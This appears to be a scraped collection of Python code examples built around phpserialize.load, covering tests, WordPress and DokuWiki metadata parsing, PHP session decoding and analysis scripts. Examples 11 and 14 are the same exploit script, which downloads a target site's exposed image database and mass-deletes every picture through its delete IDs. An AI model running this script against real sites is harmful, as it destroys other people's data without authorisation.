Ejemplo n.º 1
0
 def test_fileio_support_with_chaining_and_all(self):
     """Dump two values into one stream, then load them back in order."""
     stream = phpserialize.BytesIO()
     phpserialize.dump([1, 2], stream)
     phpserialize.dump(42, stream)
     # Re-wrap the accumulated bytes so reading starts from the beginning.
     stream = phpserialize.BytesIO(stream.getvalue())
     # PHP arrays deserialize as dicts keyed by integer index.
     self.assertEqual(phpserialize.load(stream), {0: 1, 1: 2})
     self.assertEqual(phpserialize.load(stream), 42)
Ejemplo n.º 2
0
 def test_fileio_support_with_chaining_and_all(self):
     """Two consecutive dumps into one buffer must load back as two values."""
     out = phpserialize.BytesIO()
     for item in ([1, 2], 42):
         phpserialize.dump(item, out)
     payload = out.getvalue()
     reader = phpserialize.BytesIO(payload)
     # The list round-trips as an index-keyed dict; the int comes back as-is.
     self.assertEqual(phpserialize.load(reader), {0: 1, 1: 2})
     self.assertEqual(phpserialize.load(reader), 42)
Ejemplo n.º 3
0
def _parse_postmeta(element):
    """
    Retrieve post metadata as a dictionary.

    Scans the <postmeta> children of *element* and collects:
      - '_wp_attachment_metadata' -> PHP-unserialized dict under
        'attachment_metadata' (silently skipped when malformed);
      - '_wp_attached_file' -> raw text under 'attached_file'.
    """
    # NOTE: the docstring was previously placed after this import, making it
    # a dead string statement rather than the function's __doc__.
    import phpserialize

    metadata = {}
    fields = element.findall("./{%s}postmeta" % WP_NAMESPACE)

    for field in fields:
        key = field.find("./{%s}meta_key" % WP_NAMESPACE).text
        value = field.find("./{%s}meta_value" % WP_NAMESPACE).text

        if key == "_wp_attachment_metadata":
            # NOTE(review): StringIO(value.encode()) implies Python 2; under
            # Python 3 phpserialize.load needs a bytes stream (io.BytesIO) —
            # confirm the target runtime before changing.
            stream = StringIO(value.encode())
            try:
                metadata["attachment_metadata"] = phpserialize.load(stream)
            except ValueError:
                # Malformed serialized payloads are ignored on purpose; any
                # other exception propagates unchanged (the old explicit
                # `except Exception as e: raise(e)` was redundant and reset
                # the traceback under Python 2).
                pass

        if key == "_wp_attached_file":
            metadata["attached_file"] = value

    return metadata
Ejemplo n.º 4
0
def _parse_postmeta(element, metadata_keys=None):
    """
    Retrieve post metadata as a dictionary.

    Scans the <postmeta> children of *element* and collects:
      - any key listed in *metadata_keys* -> raw text under that key;
      - '_wp_attachment_metadata' -> PHP-unserialized dict under
        'attachment_metadata' (silently skipped when malformed);
      - '_wp_attached_file' -> raw text under 'attached_file'.
    """
    # NOTE: the docstring was previously placed after this import, making it
    # a dead string statement rather than the function's __doc__.
    import phpserialize

    metadata = {}
    fields = element.findall("./{%s}postmeta" % WP_NAMESPACE)

    for field in fields:
        key = field.find("./{%s}meta_key" % WP_NAMESPACE).text
        value = field.find("./{%s}meta_value" % WP_NAMESPACE).text

        if metadata_keys and key in metadata_keys:
            metadata[key] = value
        if key == "_wp_attachment_metadata":
            # NOTE(review): StringIO(value.encode()) implies Python 2; under
            # Python 3 phpserialize.load needs a bytes stream (io.BytesIO) —
            # confirm the target runtime before changing.
            stream = StringIO(value.encode())
            try:
                metadata["attachment_metadata"] = phpserialize.load(stream)
            except ValueError:
                # Malformed serialized payloads are ignored on purpose; any
                # other exception propagates unchanged (the old explicit
                # `except Exception as e: raise(e)` was redundant and reset
                # the traceback under Python 2).
                pass

        if key == "_wp_attached_file":
            metadata["attached_file"] = value

    return metadata
Ejemplo n.º 5
0
def read_dat(fname):
    """Parse a PHP-serialized .dat file.

    @param fname: str, filename
    @return: object structure (arrays as OrderedDict, objects via object_hook)
    """
    logging.debug('Reading data from: {0}'.format(fname))
    with open(fname, "r") as handle:
        return load(handle, array_hook=OrderedDict, object_hook=object_hook)
Ejemplo n.º 6
0
def read_dat(fname):
    """Deserialize a PHP .dat file into Python structures.

    @param fname: str, filename
    @return: object structure (arrays as OrderedDict, objects via object_hook)
    """
    logging.debug('Reading data from: {0}'.format(fname))
    with open(fname, "r") as source:
        parsed = load(source, array_hook=OrderedDict, object_hook=object_hook)
    return parsed
Ejemplo n.º 7
0
def analyze_profiling_result(base_name):
    """Load the xhprof payload and JSON metadata for *base_name*,
    persist them via storage, and pretty-print both."""
    with open(base_name + ".xhprof_testing") as fh:
        data = phpserialize.load(fh)

    with open(base_name + ".json") as fh:
        metadata = json.load(fh)

    storage.save_profiling_result(data, metadata)

    pprint.pprint(data)
    pprint.pprint(metadata)
Ejemplo n.º 8
0
def decode(data):
    """Decode a PHP session payload of the form ``name|<serialized>name|...``.

    Returns a dict mapping each session-variable name to its decoded value.
    PHP arrays whose keys are exactly 0..n-1 are converted to Python lists.
    """
    fp = StringIO(data)
    result = {}
    while True:
        # Each record is "<name>|<php-serialized-value>".
        npos = data.find('|', fp.tell())
        if npos == -1:
            break
        name = data[fp.tell():npos]
        fp.seek(npos + 1)
        value = phpserialize.load(fp)
        try:
            # A PHP array with contiguous integer keys is really a list.
            # `list(range(...))` (not bare `range`) so the comparison is
            # correct on Python 3 as well as Python 2.
            if sorted(map(int, value.keys())) == list(range(len(value))):
                value = phpserialize.dict_to_list(value)
        except (ValueError, TypeError, AttributeError):
            # Scalars (no .keys) or non-integer keys: keep the value as-is.
            # Narrowed from a bare `except:` so real errors are not swallowed.
            pass
        result[name] = value
    return result
Ejemplo n.º 9
0
def filter_meta_file(path):
    """Load a phpserialize'd meta file, redact non-localhost last-change IPs,
    and return (BytesIO, size) with the re-serialized payload."""
    with open(path, 'rb') as fh:
        meta = phpserialize.load(fh)

    for section in [b'current', b'persistent']:
        # Mirror the original guard chain with early continues.
        if section not in meta:
            continue
        if b'last_change' not in meta[section]:
            continue
        change = meta[section][b'last_change']
        if not isinstance(change, dict) or b'ip' not in change:
            continue
        if change[b'ip'] != b'127.0.0.1':
            change[b'ip'] = b'redacted-ip'

    output = io.BytesIO()
    phpserialize.dump(meta, output)
    size = output.tell()
    output.seek(0)

    return output, size
Ejemplo n.º 10
0
	def GET(self, id, metric):
		"""Serve graph data for *metric* of job *id*: JSON from MongoDB,
		falling back to a legacy on-disk PNG when Mongo access raises IOError."""
		try:
			job = db.jobs.find_one({"_id": bson.objectid.ObjectId(id)})
			for graph in job["Graphs"]:
				if graph["name"] == metric:
					return json.dumps(db.graphs.find_one({"_id": graph["graph"]}, {"_id": False, "job": False}), default=encode_datetime_to_javascript)
		except IOError:
			# Legacy fallback: graphs live on disk, sharded into nested dirs by id.
			import phpserialize
			id = int(id)
			# NOTE(review): id/100%100 relies on Python 2 integer division —
			# confirm before porting to Python 3 (would need //).
			pointsDir = os.path.join(settings["graphsdir"], str(id%100), str(id/100%100), str(id))
			pointsDescFile = os.path.join(pointsDir, "pointsDescriptions")
			# NOTE(review): this file handle is never closed.
			jobData = phpserialize.load(open(pointsDescFile))
			for graph in jobData.values():
				if graph["name"] == metric:
					pointGraph = os.path.join(pointsDir, "job.%d-point.%s.png"% (id, graph["point_id"]))
					break
			try:
				web.header("content-Type", "image/png")
				return open(pointGraph).read()
			except:
				# Best-effort: any failure (no matching graph bound pointGraph,
				# unreadable file) silently yields an empty response.
				pass
Ejemplo n.º 11
0
import urllib2

if __name__ == '__main__':
    # Python 2 script: downloads a base64-encoded image database from the
    # target and deletes every picture it references.
    if len(sys.argv) == 1:
        print "ERROR: Provide a valid URL"
        sys.exit(-1)
    url = sys.argv[1]

    ids = []

    try:
        print "[+] Target: {}".format(url)
        print "[+] Downloading the database..."
        response = urllib2.urlopen("{}/upload/data/imgdb.db".format(url))
        print "[+] Decoding database..."
        with open("imgdb.db.txt", "w+") as f:
            f.write(base64.b64decode(response.read()))
        print "[+] Finding pictues..."
        # Each record's 'deleteid' is the token required to delete that picture.
        for key, value in phpserialize.load(file("imgdb.db.txt")).iteritems():
            ids.append(value.get('deleteid'))
        print "[+] Pictures found: {}".format(len(ids))
        print "[+] Ready... let's do this! Deleting all pictures..."
        for id in ids:
            urllib2.urlopen("{}/?d={}".format(url, id))
        print "[+] Done."

    except urllib2.URLError, ex:
        # A "Forbidden" reason is taken to mean the target is patched.
        if ex.reason == "Forbidden":
            print "[-] ERROR: this version is not vulnerable."
    except EOFError, e:
        # Truncated/garbage database: surface the failure to the caller.
        raise e
Ejemplo n.º 12
0
        # it has  >10 unicode characters
        data = re.sub('[^\x00-\x7f]', 'AA', data, count=6)  #TH
        data = re.sub('[^\x00-\x7f]', 'XXX', data, count=5)  #TH

    #default
    data = re.sub('[^\x00-\x7f]', 'XXX', data)

    if debug:
        print "PARSED", data
        find = re.search('[^\x00-\x7f]', data)
        if find:
            print "Find NON ASCII caracter '" + find.group(0) + "'"

    try:
        #data=re.sub('[^\x00-\x7f]','XXX',data)
        quest = php.load(StringIO(data))
    except ValueError:
        try:
            data = row[4]
            data = re.sub('[^\x00-\x7f]', 'XX', data)
            quest = php.load(StringIO(data))
        except ValueError:
            try:
                data = row[4]
                data = re.sub('[^\x00-\x7f]', 'XX', data, count=1)
                data = re.sub('[^\x00-\x7f]', 'XXX', data)
                quest = php.load(StringIO(data))
            except ValueError:
                try:
                    data = row[4]
                    data = re.sub('[^\x00-\x7f]', 'XXX', data, count=1)
import os
import sys
import phpserialize
from multiprocessing import Process
from network import Network

__DIR__ = os.path.dirname(os.path.abspath(__file__))

if len(sys.argv) != 2 or not sys.argv[1].isdigit():
    exit('usage: %s bucket' % sys.argv[0])

# read data file
# BUG FIX: the format string has two placeholders (%s and %03d) but was
# given only __DIR__, which raised TypeError at runtime; supply the bucket
# number too (matching the sibling script's formatting).
infile = '%s/data/bucket-%03d.txt' % (__DIR__, int(sys.argv[1]))
# Use a context manager so the handle is closed (it was previously leaked).
with open(infile) as f:
    links = phpserialize.load(f)

# Total number of user->word edges in the loaded link structure.
edges = 0
for words in links.get('users').itervalues():
    edges += len(words)

def average_degree(network, alias, link_type):
    # Print the network's mean degree for *link_type*, labeled with *alias*
    # (Python 2 print statement).
    print "<%s> = %f" % (alias, network.average_degree(link_type))


def network_collaborative_similarity(network, alias, link_type, link_n_type):
    # Print the collaborative similarity C for the given link types,
    # labeled with *alias* (Python 2 print statement).
    print "C_%s = %s" % (alias, network.network_collaborative_similarity(link_type, link_n_type, False))

def average_jaccard_similarity(network, alias, link_type, link_n_type):
    # Print the mean Jaccard similarity s for the given link types,
    # labeled with *alias* (Python 2 print statement).
    print "s_%s = %s" % (alias, network.average_jaccard_similarity(link_type, link_n_type, False))
Ejemplo n.º 14
0
import urllib2

if __name__ == '__main__':
    # Python 2 script (duplicate of the earlier example): fetches a
    # base64-encoded image database and deletes every referenced picture.
    if len(sys.argv) == 1:
        print "ERROR: Provide a valid URL"
        sys.exit(-1)
    url = sys.argv[1]

    ids = []

    try:
        print "[+] Target: {}".format(url)
        print "[+] Downloading the database..."
        response = urllib2.urlopen("{}/upload/data/imgdb.db".format(url))
        print "[+] Decoding database..."
        with open("imgdb.db.txt", "w+") as f:
            f.write(base64.b64decode(response.read()))
        print "[+] Finding pictues..."
        # The database maps keys to records whose 'deleteid' authorizes deletion.
        for key, value in phpserialize.load(file("imgdb.db.txt")).iteritems():
            ids.append(value.get('deleteid'))
        print "[+] Pictures found: {}".format(len(ids))
        print "[+] Ready... let's do this! Deleting all pictures..."
        for id in ids:
            urllib2.urlopen("{}/?d={}".format(url, id))
        print "[+] Done."

    except urllib2.URLError, ex:
        # "Forbidden" is interpreted as a patched, non-vulnerable target.
        if ex.reason == "Forbidden":
            print "[-] ERROR: this version is not vulnerable."
    except EOFError, e:
        # Unexpected end of serialized data: re-raise for visibility.
        raise e
Ejemplo n.º 15
0
update content set creator = (select user_key from user_mapping where lower_username = '******')
 where contentid in (select c2.contentid from content c2 where c2.title = '{1}'
                     and spaceid = (select spaceid from spaces where spacekey = '{2}'));
""".format(last_change_user, pagename, space)
    sql_script.write(sql_statement)


top_page = join(doku_data_path, 'pages')
# Walk every DokuWiki page source and record who last changed it.
for project_dir, subdirs, files in os.walk(top_page):
    for filename in files:
        if filename[-4:] != '.txt':
            continue
        # Page title: underscores become spaces, extension dropped.
        pagename = filename.replace('_', ' ').strip()[:-4]

        # The page's metadata lives in a parallel 'meta' tree.
        meta_file = join(project_dir.replace('pages', 'meta'),
                         filename[:-4] + '.meta')
        with open(meta_file, 'rb') as f:
            data = phpserialize.load(f)
        # phpserialize yields bytes keys; map the DokuWiki user to Confluence.
        last_change_user = data[b'persistent'][b'last_change'][b'user']
        last_change_user = doku_confluence_user[last_change_user]

        save(pagename, last_change_user)

sql_script.close()

# Local Variables:
# compile-command: "python3 create-sql-script.py"
# End:

# vim:et:sw=4:ts=4:
Ejemplo n.º 16
0
import subprocess
import phpserialize
import StringIO

ENVIRONMENT_VARIABLE = "JOOMLA_CONFIGURATION"

# An unset variable and one set to the empty string are both treated as
# "configuration not found".
configuration = os.environ.get(ENVIRONMENT_VARIABLE)
if not configuration:
    raise ConfigurationNotFound(
        "Configuration cannot be loaded, because environment variable %s is undefined." % ENVIRONMENT_VARIABLE
    )

if not os.path.exists(configuration):
    raise ConfigurationNotFound("Configuration file could not be found in %s" % configuration)

path = os.path.abspath(os.path.join(os.getcwd(), configuration))

# Let PHP itself instantiate JConfig and serialize it, then parse that
# serialized form on the Python side.
cmd = ["php", "-r", """include('%s'); $config = new JConfig; echo serialize($config);""" % path]
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
output, error = proc.communicate()
# Wrap the serialized output in a file-like object for phpserialize.load().
stream = StringIO.StringIO(output)

jconfig = phpserialize.load(stream, object_hook=phpserialize.phpobject)
Ejemplo n.º 17
0
 def load(self, fp=None):
     """Deserialize PHP objects from *fp*, or from ``self.fp`` when *fp*
     is not given (falsy)."""
     source = fp if fp else self.fp
     return phpserialize.load(source, object_hook=phpserialize.phpobject)
                outfile_path = '%s/nodes/user-%09d.txt' % (__DIR__, user)
                with open(outfile_path, 'a') as outfile:
                    # file format:
                    # bucket C_u(i)
                    outfile.write("%d %f\n" % (int(sys.argv[1]), collaborative_similarity))
                nodes.task_done()
            except Empty:
                if nodes.empty():
                    self.stop()


if __name__ == '__main__':
    # Python 2 driver: loads one bucket's link data, then fans node
    # processing out over one worker process per CPU thread.
    # read data file
    infile_path = '%s/data/bucket-%03d.txt' % (__DIR__, int(sys.argv[1]))
    with open(infile_path) as infile:
        links = phpserialize.load(infile)
    # create network
    network = Network(links)
    # create nodes queue
    nodes = JoinableQueue()
    # add tasks to queue
    for user, words in links.get('users').iteritems():
        nodes.put(user)
    # start as much processes as CPU has threads
    processes = cpu_count()
    print 'Starting %d processes...' % processes
    for x in xrange(0, processes):
        NetworkWorker(x).start()
    # wait for Queue to empty
    print 'Waiting to complete tasks...'
    nodes.join()
    sql_statement = """
update content set creator = (select user_key from user_mapping where lower_username = '******')
 where contentid in (select c2.contentid from content c2 where c2.title = '{1}'
                     and spaceid = (select spaceid from spaces where spacekey = '{2}'));
""".format(last_change_user, pagename, space)
    sql_script.write(sql_statement)

top_page = join(doku_data_path, 'pages')
# Walk every DokuWiki page source and emit a SQL fix-up for its creator.
for project_dir, subdirs, files in os.walk(top_page):
    for filename in files:
        if filename[-4:] == '.txt':
            # Page title: underscores become spaces, '.txt' is dropped.
            pagename = filename.replace('_',' ').strip()
            pagename = pagename[:-4]

            # The matching metadata file lives in a parallel 'meta' tree.
            meta_file = (join (project_dir.replace('pages', 'meta'), filename[:-4] + '.meta'))
            with open (meta_file, 'rb') as f:
                data = phpserialize.load(f)
            # phpserialize returns bytes keys; translate the DokuWiki user
            # to its Confluence counterpart.
            last_change_user = data[b'persistent'][b'last_change'][b'user']
            last_change_user = doku_confluence_user[last_change_user]

            save (pagename, last_change_user)

sql_script.close()

# Local Variables:
# compile-command: "python3 create-sql-script.py"
# End:

# vim:et:sw=4:ts=4: